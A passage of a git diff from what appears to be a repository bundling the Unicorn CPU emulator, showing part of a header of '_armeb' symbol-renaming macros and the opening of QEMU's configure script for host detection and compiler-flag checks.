tcg_out32 tcg_out32_armeb +#define tcg_out64 tcg_out64_armeb +#define tcg_out8 tcg_out8_armeb +#define tcg_out_addi tcg_out_addi_armeb +#define tcg_out_branch tcg_out_branch_armeb +#define tcg_out_brcond32 tcg_out_brcond32_armeb +#define tcg_out_brcond64 tcg_out_brcond64_armeb +#define tcg_out_bswap32 tcg_out_bswap32_armeb +#define tcg_out_bswap64 tcg_out_bswap64_armeb +#define tcg_out_call tcg_out_call_armeb +#define tcg_out_cmp tcg_out_cmp_armeb +#define tcg_out_ext16s tcg_out_ext16s_armeb +#define tcg_out_ext16u tcg_out_ext16u_armeb +#define tcg_out_ext32s tcg_out_ext32s_armeb +#define tcg_out_ext32u tcg_out_ext32u_armeb +#define tcg_out_ext8s tcg_out_ext8s_armeb +#define tcg_out_ext8u tcg_out_ext8u_armeb +#define tcg_out_jmp tcg_out_jmp_armeb +#define tcg_out_jxx tcg_out_jxx_armeb +#define tcg_out_label tcg_out_label_armeb +#define tcg_out_ld tcg_out_ld_armeb +#define tcg_out_modrm tcg_out_modrm_armeb +#define tcg_out_modrm_offset tcg_out_modrm_offset_armeb +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_armeb +#define tcg_out_mov tcg_out_mov_armeb +#define tcg_out_movcond32 tcg_out_movcond32_armeb +#define tcg_out_movcond64 tcg_out_movcond64_armeb +#define tcg_out_movi tcg_out_movi_armeb +#define tcg_out_op tcg_out_op_armeb +#define tcg_out_pop tcg_out_pop_armeb +#define tcg_out_push tcg_out_push_armeb +#define tcg_out_qemu_ld tcg_out_qemu_ld_armeb +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_armeb +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_armeb +#define tcg_out_qemu_st tcg_out_qemu_st_armeb +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_armeb +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_armeb +#define tcg_out_reloc tcg_out_reloc_armeb +#define tcg_out_rolw_8 tcg_out_rolw_8_armeb +#define tcg_out_setcond32 tcg_out_setcond32_armeb +#define tcg_out_setcond64 tcg_out_setcond64_armeb +#define tcg_out_shifti tcg_out_shifti_armeb +#define tcg_out_st tcg_out_st_armeb +#define tcg_out_tb_finalize 
tcg_out_tb_finalize_armeb +#define tcg_out_tb_init tcg_out_tb_init_armeb +#define tcg_out_tlb_load tcg_out_tlb_load_armeb +#define tcg_out_vex_modrm tcg_out_vex_modrm_armeb +#define tcg_patch32 tcg_patch32_armeb +#define tcg_patch8 tcg_patch8_armeb +#define tcg_pcrel_diff tcg_pcrel_diff_armeb +#define tcg_pool_reset tcg_pool_reset_armeb +#define tcg_prologue_init tcg_prologue_init_armeb +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_armeb +#define tcg_reg_alloc tcg_reg_alloc_armeb +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_armeb +#define tcg_reg_alloc_call tcg_reg_alloc_call_armeb +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_armeb +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_armeb +#define tcg_reg_alloc_op tcg_reg_alloc_op_armeb +#define tcg_reg_alloc_start tcg_reg_alloc_start_armeb +#define tcg_reg_free tcg_reg_free_armeb +#define tcg_reg_sync tcg_reg_sync_armeb +#define tcg_set_frame tcg_set_frame_armeb +#define tcg_set_nop tcg_set_nop_armeb +#define tcg_swap_cond tcg_swap_cond_armeb +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_armeb +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_armeb +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_armeb +#define tcg_target_const_match tcg_target_const_match_armeb +#define tcg_target_init tcg_target_init_armeb +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_armeb +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_armeb +#define tcg_temp_alloc tcg_temp_alloc_armeb +#define tcg_temp_free_i32 tcg_temp_free_i32_armeb +#define tcg_temp_free_i64 tcg_temp_free_i64_armeb +#define tcg_temp_free_internal tcg_temp_free_internal_armeb +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_armeb +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_armeb +#define tcg_temp_new_i32 tcg_temp_new_i32_armeb +#define tcg_temp_new_i64 tcg_temp_new_i64_armeb +#define tcg_temp_new_internal tcg_temp_new_internal_armeb +#define tcg_temp_new_internal_i32 
tcg_temp_new_internal_i32_armeb +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_armeb +#define tdb_hash tdb_hash_armeb +#define teecr_write teecr_write_armeb +#define teehbr_access teehbr_access_armeb +#define temp_allocate_frame temp_allocate_frame_armeb +#define temp_dead temp_dead_armeb +#define temps_are_copies temps_are_copies_armeb +#define temp_save temp_save_armeb +#define temp_sync temp_sync_armeb +#define tgen_arithi tgen_arithi_armeb +#define tgen_arithr tgen_arithr_armeb +#define thumb2_logic_op thumb2_logic_op_armeb +#define ti925t_initfn ti925t_initfn_armeb +#define tlb_add_large_page tlb_add_large_page_armeb +#define tlb_flush_entry tlb_flush_entry_armeb +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_armeb +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_armeb +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_armeb +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_armeb +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_armeb +#define tlbi_aa64_va_write tlbi_aa64_va_write_armeb +#define tlbiall_is_write tlbiall_is_write_armeb +#define tlbiall_write tlbiall_write_armeb +#define tlbiasid_is_write tlbiasid_is_write_armeb +#define tlbiasid_write tlbiasid_write_armeb +#define tlbimvaa_is_write tlbimvaa_is_write_armeb +#define tlbimvaa_write tlbimvaa_write_armeb +#define tlbimva_is_write tlbimva_is_write_armeb +#define tlbimva_write tlbimva_write_armeb +#define tlb_is_dirty_ram tlb_is_dirty_ram_armeb +#define tlb_protect_code tlb_protect_code_armeb +#define tlb_reset_dirty_range tlb_reset_dirty_range_armeb +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_armeb +#define tlb_set_dirty tlb_set_dirty_armeb +#define tlb_set_dirty1 tlb_set_dirty1_armeb +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_armeb +#define tlb_vaddr_to_host tlb_vaddr_to_host_armeb +#define token_get_type token_get_type_armeb +#define token_get_value token_get_value_armeb +#define token_is_escape token_is_escape_armeb +#define 
token_is_keyword token_is_keyword_armeb +#define token_is_operator token_is_operator_armeb +#define tokens_append_from_iter tokens_append_from_iter_armeb +#define to_qiv to_qiv_armeb +#define to_qov to_qov_armeb +#define tosa_init tosa_init_armeb +#define tosa_machine_init tosa_machine_init_armeb +#define tswap32 tswap32_armeb +#define tswap64 tswap64_armeb +#define type_class_get_size type_class_get_size_armeb +#define type_get_by_name type_get_by_name_armeb +#define type_get_parent type_get_parent_armeb +#define type_has_parent type_has_parent_armeb +#define type_initialize type_initialize_armeb +#define type_initialize_interface type_initialize_interface_armeb +#define type_is_ancestor type_is_ancestor_armeb +#define type_new type_new_armeb +#define type_object_get_size type_object_get_size_armeb +#define type_register_internal type_register_internal_armeb +#define type_table_add type_table_add_armeb +#define type_table_get type_table_get_armeb +#define type_table_lookup type_table_lookup_armeb +#define uint16_to_float32 uint16_to_float32_armeb +#define uint16_to_float64 uint16_to_float64_armeb +#define uint32_to_float32 uint32_to_float32_armeb +#define uint32_to_float64 uint32_to_float64_armeb +#define uint64_to_float128 uint64_to_float128_armeb +#define uint64_to_float32 uint64_to_float32_armeb +#define uint64_to_float64 uint64_to_float64_armeb +#define unassigned_io_ops unassigned_io_ops_armeb +#define unassigned_io_read unassigned_io_read_armeb +#define unassigned_io_write unassigned_io_write_armeb +#define unassigned_mem_accepts unassigned_mem_accepts_armeb +#define unassigned_mem_ops unassigned_mem_ops_armeb +#define unassigned_mem_read unassigned_mem_read_armeb +#define unassigned_mem_write unassigned_mem_write_armeb +#define update_spsel update_spsel_armeb +#define v6_cp_reginfo v6_cp_reginfo_armeb +#define v6k_cp_reginfo v6k_cp_reginfo_armeb +#define v7_cp_reginfo v7_cp_reginfo_armeb +#define v7mp_cp_reginfo v7mp_cp_reginfo_armeb +#define v7m_pop 
v7m_pop_armeb +#define v7m_push v7m_push_armeb +#define v8_cp_reginfo v8_cp_reginfo_armeb +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_armeb +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_armeb +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_armeb +#define vapa_cp_reginfo vapa_cp_reginfo_armeb +#define vbar_write vbar_write_armeb +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_armeb +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_armeb +#define vfp_get_fpcr vfp_get_fpcr_armeb +#define vfp_get_fpscr vfp_get_fpscr_armeb +#define vfp_get_fpsr vfp_get_fpsr_armeb +#define vfp_reg_offset vfp_reg_offset_armeb +#define vfp_set_fpcr vfp_set_fpcr_armeb +#define vfp_set_fpscr vfp_set_fpscr_armeb +#define vfp_set_fpsr vfp_set_fpsr_armeb +#define visit_end_implicit_struct visit_end_implicit_struct_armeb +#define visit_end_list visit_end_list_armeb +#define visit_end_struct visit_end_struct_armeb +#define visit_end_union visit_end_union_armeb +#define visit_get_next_type visit_get_next_type_armeb +#define visit_next_list visit_next_list_armeb +#define visit_optional visit_optional_armeb +#define visit_start_implicit_struct visit_start_implicit_struct_armeb +#define visit_start_list visit_start_list_armeb +#define visit_start_struct visit_start_struct_armeb +#define visit_start_union visit_start_union_armeb +#define vmsa_cp_reginfo vmsa_cp_reginfo_armeb +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_armeb +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_armeb +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_armeb +#define vmsa_ttbcr_write vmsa_ttbcr_write_armeb +#define vmsa_ttbr_write vmsa_ttbr_write_armeb +#define write_cpustate_to_list write_cpustate_to_list_armeb +#define write_list_to_cpustate write_list_to_cpustate_armeb +#define write_raw_cp_reg write_raw_cp_reg_armeb +#define X86CPURegister32_lookup X86CPURegister32_lookup_armeb +#define x86_op_defs x86_op_defs_armeb +#define xpsr_read xpsr_read_armeb +#define xpsr_write xpsr_write_armeb +#define 
xscale_cpar_write xscale_cpar_write_armeb +#define xscale_cp_reginfo xscale_cp_reginfo_armeb +#define ARM_REGS_STORAGE_SIZE ARM_REGS_STORAGE_SIZE_armeb +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/configure b/ai_anti_malware/unicorn/unicorn-master/qemu/configure new file mode 100644 index 0000000..b5d52d7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/configure @@ -0,0 +1,1364 @@ +#!/bin/sh +# +# qemu configure script (c) 2003 Fabrice Bellard +# + +# Unset some variables known to interfere with behavior of common tools, +# just as autoconf does. +CLICOLOR_FORCE= GREP_OPTIONS= +unset CLICOLOR_FORCE GREP_OPTIONS + +# Temporary directory used for files created while +# configure runs. Since it is in the build directory +# we can safely blow away any previous version of it +# (and we need not jump through hoops to try to delete +# it when configure exits.) +TMPDIR1="config-temp" +rm -rf "${TMPDIR1}" +mkdir -p "${TMPDIR1}" +if [ $? -ne 0 ]; then + echo "ERROR: failed to create temporary directory" + exit 1 +fi + +TMPB="qemu-conf" +TMPC="${TMPDIR1}/${TMPB}.c" +TMPO="${TMPDIR1}/${TMPB}.o" +TMPE="${TMPDIR1}/${TMPB}.exe" + +rm -f config.log + +# Print a helpful header at the top of config.log +echo "# QEMU configure log $(date)" >> config.log +printf "# Configured with:" >> config.log +printf " '%s'" "$0" "$@" >> config.log +echo >> config.log +echo "#" >> config.log + +error_exit() { + echo + echo "ERROR: $1" + while test -n "$2"; do + echo " $2" + shift + done + echo + exit 1 +} + +do_compiler() { + # Run the compiler, capturing its output to the log. First argument + # is compiler binary to execute. + local compiler="$1" + shift + echo $compiler "$@" >> config.log + $compiler "$@" >> config.log 2>&1 || return $? + # Test passed. If this is an --enable-werror build, rerun + # the test with -Werror and bail out if it fails. This + # makes warning-generating-errors in configure test code + # obvious to developers. 
+ if test "$werror" != "yes"; then + return 0 + fi + # Don't bother rerunning the compile if we were already using -Werror + case "$*" in + *-Werror*) + return 0 + ;; + esac + echo $compiler -Werror "$@" >> config.log + $compiler -Werror "$@" >> config.log 2>&1 && return $? + error_exit "configure test passed without -Werror but failed with -Werror." \ + "This is probably a bug in the configure script. The failing command" \ + "will be at the bottom of config.log." \ + "You can run configure with --disable-werror to bypass this check." +} + +do_cc() { + do_compiler "$cc" "$@" +} + +compile_object() { + do_cc $QEMU_CFLAGS -c -o $TMPO $TMPC +} + +compile_prog() { + local_cflags="$1" + local_ldflags="$2" + do_cc $QEMU_CFLAGS $local_cflags -o $TMPE $TMPC $LDFLAGS $local_ldflags +} + +# symbolically link $1 to $2. Portable version of "ln -sf". +symlink() { + rm -rf "$2" + mkdir -p "$(dirname "$2")" + ln -s "$1" "$2" +} + +# check whether a command is available to this shell (may be either an +# executable or a builtin) +has() { + type "$1" >/dev/null 2>&1 +} + +# search for an executable in PATH +path_of() { + local_command="$1" + local_ifs="$IFS" + local_dir="" + + # pathname has a dir component? + if [ "${local_command#*/}" != "$local_command" ]; then + if [ -x "$local_command" ] && [ ! -d "$local_command" ]; then + echo "$local_command" + return 0 + fi + fi + if [ -z "$local_command" ]; then + return 1 + fi + + IFS=: + for local_dir in $PATH; do + if [ -x "$local_dir/$local_command" ] && [ ! -d "$local_dir/$local_command" ]; then + echo "$local_dir/$local_command" + IFS="${local_ifs:-$(printf ' \t\n')}" + return 0 + fi + done + # not found + IFS="${local_ifs:-$(printf ' \t\n')}" + return 1 +} + +# default parameters +source_path=`dirname "$0"` +cpu="" +static="no" +cross_prefix="" +host_cc="cc" +cc_i386=i386-pc-linux-gnu-gcc +debug_info="yes" +stack_protector="" + +# Don't accept a target_list environment variable. 
+unset target_list + +# Default value for a variable defining feature "foo". +# * foo="no" feature will only be used if --enable-foo arg is given +# * foo="" feature will be searched for, and if found, will be used +# unless --disable-foo is given +# * foo="yes" this value will only be set by --enable-foo flag. +# feature will searched for, +# if not found, configure exits with error +# +# Always add --enable-foo and --disable-foo command line args. +# Distributions want to ensure that several features are compiled in, and it +# is impossible without a --enable-foo that exits if a feature is not found. + +debug_tcg="no" +debug="no" +strip_opt="yes" +bigendian="no" +mingw32="no" +EXESUF="" +DSOSUF=".so" +LDFLAGS_SHARED="-shared" +bsd="no" +linux="no" +solaris="no" +softmmu="yes" +aix="no" +pie="" + +# parse CC options first +for opt do + optarg=`expr "x$opt" : 'x[^=]*=\(.*\)'` + case "$opt" in + --cc=*) CC="$optarg" + ;; + --source-path=*) source_path="$optarg" + ;; + --cpu=*) cpu="$optarg" + ;; + --extra-cflags=*) QEMU_CFLAGS="$optarg $QEMU_CFLAGS" + EXTRA_CFLAGS="$optarg" + ;; + --extra-ldflags=*) LDFLAGS="$optarg $LDFLAGS" + EXTRA_LDFLAGS="$optarg" + ;; + --enable-debug-info) debug_info="yes" + ;; + --disable-debug-info) debug_info="no" + ;; + esac +done +# OS specific +# Using uname is really, really broken. Once we have the right set of checks +# we can eliminate its usage altogether. + +# Preferred compiler: +# ${CC} (if set) +# ${cross_prefix}gcc (if cross-prefix specified) +# system compiler +if test -z "${CC}${cross_prefix}"; then + cc="$host_cc" +else + cc="${CC-${cross_prefix}gcc}" +fi + +ar="${AR-${cross_prefix}ar}" +as="${AS-${cross_prefix}as}" +cpp="${CPP-$cc -E}" +objcopy="${OBJCOPY-${cross_prefix}objcopy}" +ld="${LD-${cross_prefix}ld}" +nm="${NM-${cross_prefix}nm}" +strip="${STRIP-${cross_prefix}strip}" + +# If the user hasn't specified ARFLAGS, default to 'rv', just as make does. 
+ARFLAGS="${ARFLAGS-rv}" + +# default flags for all hosts +QEMU_CFLAGS="-fno-strict-aliasing -fno-common $QEMU_CFLAGS" +QEMU_CFLAGS="-Wall -Wundef -Wwrite-strings -Wmissing-prototypes $QEMU_CFLAGS" +QEMU_CFLAGS="-Wstrict-prototypes -Wredundant-decls $QEMU_CFLAGS" +QEMU_CFLAGS="-D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE $QEMU_CFLAGS" +QEMU_INCLUDES="-I. -I\$(SRC_PATH) -I\$(SRC_PATH)/include" +if test "$debug_info" = "yes"; then + CFLAGS="-g $CFLAGS" + LDFLAGS="-g $LDFLAGS" +else + CFLAGS="-O3 $CFLAGS" + LDFLAGS="-O3 $LDFLAGS" +fi + +# make source path absolute +source_path=`cd "$source_path"; pwd` + +# running configure in the source tree? +# we know that's the case if configure is there. +if test -f "./configure"; then + pwd_is_source_path="y" +else + pwd_is_source_path="n" +fi + +check_define() { +cat > $TMPC <<EOF +#if !defined($1) +#error $1 not defined +#endif +int main(void) { return 0; } +EOF + compile_object +} + +if check_define __linux__ ; then + targetos="Linux" +elif check_define _WIN32 ; then + targetos='MINGW32' +elif check_define __OpenBSD__ ; then + targetos='OpenBSD' +elif check_define __sun__ ; then + targetos='SunOS' +elif check_define __HAIKU__ ; then + targetos='Haiku' +else + targetos=`uname -s` +fi + +# Some host OSes need non-standard checks for which CPU to use. +# Note that these checks are broken for cross-compilation: if you're +# cross-compiling to one of these OSes then you'll need to specify +# the correct CPU with the --cpu option. +case $targetos in +Darwin) + # on Leopard most of the system is 32-bit, so we have to ask the kernel if we can + # run 64-bit userspace code. + # If the user didn't specify a CPU explicitly and the kernel says this is + # 64 bit hw, then assume x86_64. Otherwise fall through to the usual detection code. 
+ if test -z "$cpu" && test "$(sysctl -n hw.optional.x86_64)" = "1"; then + cpu="x86_64" + fi + ;; +SunOS) + # `uname -m` returns i86pc even on an x86_64 box, so default based on isainfo + if test -z "$cpu" && test "$(isainfo -k)" = "amd64"; then + cpu="x86_64" + fi +esac + +if test ! -z "$cpu" ; then + # command line argument + : +elif check_define __i386__ ; then + cpu="i386" +elif check_define __x86_64__ ; then + if check_define __ILP32__ ; then + cpu="x32" + else + cpu="x86_64" + fi +elif check_define __sparc__ ; then + if check_define __arch64__ ; then + cpu="sparc64" + else + cpu="sparc" + fi +elif check_define _ARCH_PPC ; then + if check_define _ARCH_PPC64 ; then + cpu="ppc64" + else + cpu="ppc" + fi +elif check_define __mips__ ; then + cpu="mips" +elif check_define __ia64__ ; then + cpu="ia64" +elif check_define __s390__ ; then + if check_define __s390x__ ; then + cpu="s390x" + else + cpu="s390" + fi +elif check_define __arm__ ; then + cpu="arm" +elif check_define __aarch64__ ; then + cpu="aarch64" +elif check_define __hppa__ ; then + cpu="hppa" +else + cpu=`uname -m` +fi + +ARCH= +# Normalise host CPU name and set ARCH. +# Note that this case should only have supported host CPUs, not guests. 
+case "$cpu" in + ia64|ppc|ppc64|s390|s390x|sparc64|x32) + cpu="$cpu" + ;; + i386|i486|i586|i686|i86pc|BePC) + cpu="i386" + ;; + x86_64|amd64) + cpu="x86_64" + ;; + armv*b|armv*l|arm) + cpu="arm" + ;; + aarch64|aarch64eb) + cpu="aarch64" + ;; + mips*) + cpu="mips" + ;; + sparc|sun4[cdmuv]) + cpu="sparc" + ;; + *) + # This will result in either an error or falling back to TCI later + ARCH=unknown + ;; +esac +if test -z "$ARCH"; then + ARCH="$cpu" +fi + +# OS specific + +case $targetos in +CYGWIN*) + linux="yes" +;; +MINGW32*) + mingw32="yes" +;; +GNU/kFreeBSD) + bsd="yes" +;; +FreeBSD) + bsd="yes" + make="${MAKE-gmake}" + # needed for kinfo_getvmmap(3) in libutil.h + LIBS="-lutil $LIBS" +;; +DragonFly) + bsd="yes" + make="${MAKE-gmake}" +;; +NetBSD) + bsd="yes" + make="${MAKE-gmake}" +;; +OpenBSD) + bsd="yes" + make="${MAKE-gmake}" +;; +Darwin) + bsd="yes" + darwin="yes" + LDFLAGS_SHARED="-bundle -undefined dynamic_lookup" + if [ "$cpu" = "x86_64" ] ; then + QEMU_CFLAGS="-arch x86_64 $QEMU_CFLAGS" + LDFLAGS="-arch x86_64 $LDFLAGS" + fi + # Disable attempts to use ObjectiveC features in os/object.h since they + # won't work when we're compiling with gcc as a C compiler. + QEMU_CFLAGS="-DOS_OBJECT_USE_OBJC=0 $QEMU_CFLAGS" +;; +SunOS) + solaris="yes" + make="${MAKE-gmake}" + ld="gld" + needs_libsunmath="no" + solarisrev=`uname -r | cut -f2 -d.` + if [ "$cpu" = "i386" -o "$cpu" = "x86_64" ] ; then + if test "$solarisrev" -le 9 ; then + if test -f /opt/SUNWspro/prod/lib/libsunmath.so.1; then + needs_libsunmath="yes" + QEMU_CFLAGS="-I/opt/SUNWspro/prod/include/cc $QEMU_CFLAGS" + LDFLAGS="-L/opt/SUNWspro/prod/lib -R/opt/SUNWspro/prod/lib $LDFLAGS" + LIBS="-lsunmath $LIBS" + else + error_exit "QEMU will not link correctly on Solaris 8/X86 or 9/x86 without" \ + "libsunmath from the Sun Studio compilers tools, due to a lack of" \ + "C99 math features in libm.so in Solaris 8/x86 and Solaris 9/x86" \ + "Studio 11 can be downloaded from www.sun.com." 
+ fi + fi + fi +# needed for CMSG_ macros in sys/socket.h + QEMU_CFLAGS="-D_XOPEN_SOURCE=600 $QEMU_CFLAGS" +# needed for TIOCWIN* defines in termios.h + QEMU_CFLAGS="-D__EXTENSIONS__ $QEMU_CFLAGS" + QEMU_CFLAGS="-std=gnu99 $QEMU_CFLAGS" + solarisnetlibs="-lsocket -lnsl -lresolv" + LIBS="$solarisnetlibs $LIBS" +;; +AIX) + aix="yes" + make="${MAKE-gmake}" +;; +Haiku) + haiku="yes" + QEMU_CFLAGS="-DB_USE_POSITIVE_POSIX_ERRORS $QEMU_CFLAGS" + LIBS="-lposix_error_mapper -lnetwork $LIBS" +;; +*) + linux="yes" +;; +esac + +: ${make=${MAKE-make}} + +# Default objcc to clang if available, otherwise use CC +if has clang; then + objcc=clang +else + objcc="$cc" +fi + +if test "$mingw32" = "yes" ; then + EXESUF=".exe" + DSOSUF=".dll" + QEMU_CFLAGS="-DWIN32_LEAN_AND_MEAN -DWINVER=0x501 $QEMU_CFLAGS" + # enable C99/POSIX format strings (needs mingw32-runtime 3.15 or later) + QEMU_CFLAGS="-D__USE_MINGW_ANSI_STDIO=1 $QEMU_CFLAGS" + LIBS="-lwinmm -lws2_32 -liphlpapi $LIBS" +cat > $TMPC << EOF +int main(void) { return 0; } +EOF + if compile_prog "" "-liberty" ; then + LIBS="-liberty $LIBS" + fi +fi + +werror="" + +for opt do + optarg=`expr "x$opt" : 'x[^=]*=\(.*\)'` + case "$opt" in + --help|-h) show_help=yes + ;; + --version|-V) exec cat $source_path/VERSION + ;; + --source-path=*) + ;; + --cc=*) + ;; + --host-cc=*) host_cc="$optarg" + ;; + --objcc=*) objcc="$optarg" + ;; + --make=*) make="$optarg" + ;; + --extra-cflags=*) + ;; + --extra-ldflags=*) + ;; + --enable-debug-info) + ;; + --disable-debug-info) + ;; + --cpu=*) + ;; + --target-list=*) target_list="$optarg" + ;; + --static) + static="yes" + LDFLAGS="-static $LDFLAGS" + ;; + --enable-debug-tcg) debug_tcg="yes" + ;; + --disable-debug-tcg) debug_tcg="no" + ;; + --enable-debug) + # Enable debugging options that aren't excessively noisy + debug_tcg="yes" + debug="yes" + strip_opt="no" + ;; + --disable-strip) strip_opt="no" + ;; + --enable-pie) pie="yes" + ;; + --disable-pie) pie="no" + ;; + --enable-werror) werror="yes" + ;; + 
--disable-werror) werror="no" + ;; + --enable-stack-protector) stack_protector="yes" + ;; + --disable-stack-protector) stack_protector="no" + ;; + *) + echo "ERROR: unknown option $opt" + echo "Try '$0 --help' for more information" + exit 1 + ;; + esac +done + +case "$cpu" in + ppc) + CPU_CFLAGS="-m32" + LDFLAGS="-m32 $LDFLAGS" + ;; + ppc64) + CPU_CFLAGS="-m64" + LDFLAGS="-m64 $LDFLAGS" + ;; + sparc) + LDFLAGS="-m32 $LDFLAGS" + CPU_CFLAGS="-m32 -mcpu=ultrasparc" + ;; + sparc64) + LDFLAGS="-m64 $LDFLAGS" + CPU_CFLAGS="-m64 -mcpu=ultrasparc" + ;; + s390) + CPU_CFLAGS="-m31" + LDFLAGS="-m31 $LDFLAGS" + ;; + s390x) + CPU_CFLAGS="-m64" + LDFLAGS="-m64 $LDFLAGS" + ;; + i386) + CPU_CFLAGS="-m32" + LDFLAGS="-m32 $LDFLAGS" + cc_i386='$(CC) -m32' + ;; + x86_64) + CPU_CFLAGS="-m64" + LDFLAGS="-m64 $LDFLAGS" + cc_i386='$(CC) -m32' + ;; + x32) + CPU_CFLAGS="-mx32" + LDFLAGS="-mx32 $LDFLAGS" + cc_i386='$(CC) -m32' + ;; + # No special flags required for other host CPUs +esac + +QEMU_CFLAGS="$CPU_CFLAGS $QEMU_CFLAGS" +EXTRA_CFLAGS="$CPU_CFLAGS $EXTRA_CFLAGS" + +default_target_list="" + +mak_wilds="" + +if [ "$softmmu" = "yes" ]; then + mak_wilds="${mak_wilds} $source_path/default-configs/*-softmmu.mak" +fi + +for config in $mak_wilds; do + default_target_list="${default_target_list} $(basename "$config" .mak)" +done + +if test x"$show_help" = x"yes" ; then +cat << EOF + +Usage: configure [options] +Options: [defaults in brackets after descriptions] + +Standard options: + --help print this message + --target-list=LIST set target list (default: build everything) +$(echo Available targets: $default_target_list | \ + fold -s -w 53 | sed -e 's/^/ /') + +Advanced options (experts only): + --source-path=PATH path of source code [$source_path] + --cc=CC use C compiler CC [$cc] + --host-cc=CC use C compiler CC [$host_cc] for code run at + build time + --objcc=OBJCC use Objective-C compiler OBJCC [$objcc] + --extra-cflags=CFLAGS append extra C compiler flags QEMU_CFLAGS + 
--extra-ldflags=LDFLAGS append extra linker flags LDFLAGS + --make=MAKE use specified make [$make] + --static enable static build [$static] + --enable-debug-tcg enable TCG debugging + --disable-debug-tcg disable TCG debugging (default) + --enable-debug-info enable debugging information (default) + --disable-debug-info disable debugging information + --enable-debug enable common debug build options + --disable-strip disable stripping binaries + --disable-werror disable compilation abort on warning + --disable-stack-protector disable compiler-provided stack protection + --enable-pie build Position Independent Executables + --disable-pie do not build Position Independent Executables + --cpu=CPU Build for host CPU [$cpu] + +NOTE: The object files are built at the place where configure is launched +EOF +exit 0 +fi + +# Consult white-list to determine whether to enable werror +# by default. Only enable by default for git builds +z_version=`cut -f3 -d. $source_path/VERSION` + +if test -z "$werror" ; then + if test -d "$source_path/.git" -a \ + "$linux" = "yes" ; then + werror="yes" + else + werror="no" + fi +fi + +# check that the C compiler works. +cat > $TMPC <<EOF +int main(void) { return 0; } +EOF + +if compile_object ; then + : C compiler works ok +else + error_exit "\"$cc\" either does not exist or does not work" +fi + +gcc_flags="-Wold-style-declaration -Wold-style-definition -Wtype-limits" +gcc_flags="-Wformat-security -Wformat-y2k -Winit-self -Wignored-qualifiers $gcc_flags" +gcc_flags="-Wmissing-include-dirs -Wempty-body -Wnested-externs $gcc_flags" +gcc_flags="-Wendif-labels $gcc_flags" +gcc_flags="-Wno-initializer-overrides $gcc_flags" +gcc_flags="-Wno-string-plus-int $gcc_flags" +# Note that we do not add -Werror to gcc_flags here, because that would +# enable it for all configure tests. If a configure test failed due +# to -Werror this would just silently disable some features, +# so it's too error prone. 
+cat > $TMPC << EOF +int main(void) { return 0; } +EOF +for flag in $gcc_flags; do + # Use the positive sense of the flag when testing for -Wno-wombat + # support (gcc will happily accept the -Wno- form of unknown + # warning options). + optflag="$(echo $flag | sed -e 's/^-Wno-/-W/')" + if compile_prog "-Werror $optflag" "" ; then + QEMU_CFLAGS="$QEMU_CFLAGS $flag" + fi +done + +if test "$stack_protector" != "no"; then + gcc_flags="-fstack-protector-strong -fstack-protector-all" + sp_on=0 + for flag in $gcc_flags; do + # We need to check both a compile and a link, since some compiler + # setups fail only on a .c->.o compile and some only at link time + if do_cc $QEMU_CFLAGS -Werror $flag -c -o $TMPO $TMPC && + compile_prog "-Werror $flag" ""; then + QEMU_CFLAGS="$QEMU_CFLAGS $flag" + sp_on=1 + break + fi + done + if test "$stack_protector" = yes; then + if test $sp_on = 0; then + error_exit "Stack protector not supported" + fi + fi +fi + +# Workaround for http://gcc.gnu.org/PR55489. Happens with -fPIE/-fPIC and +# large functions that use global variables. The bug is in all releases of +# GCC, but it became particularly acute in 4.6.x and 4.7.x. It is fixed in +# 4.7.3 and 4.8.0. We should be able to delete this at the end of 2013. +cat > $TMPC << EOF +#if __GNUC__ == 4 && (__GNUC_MINOR__ == 6 || (__GNUC_MINOR__ == 7 && __GNUC_PATCHLEVEL__ <= 2)) +int main(void) { return 0; } +#else +#error No bug in this compiler. 
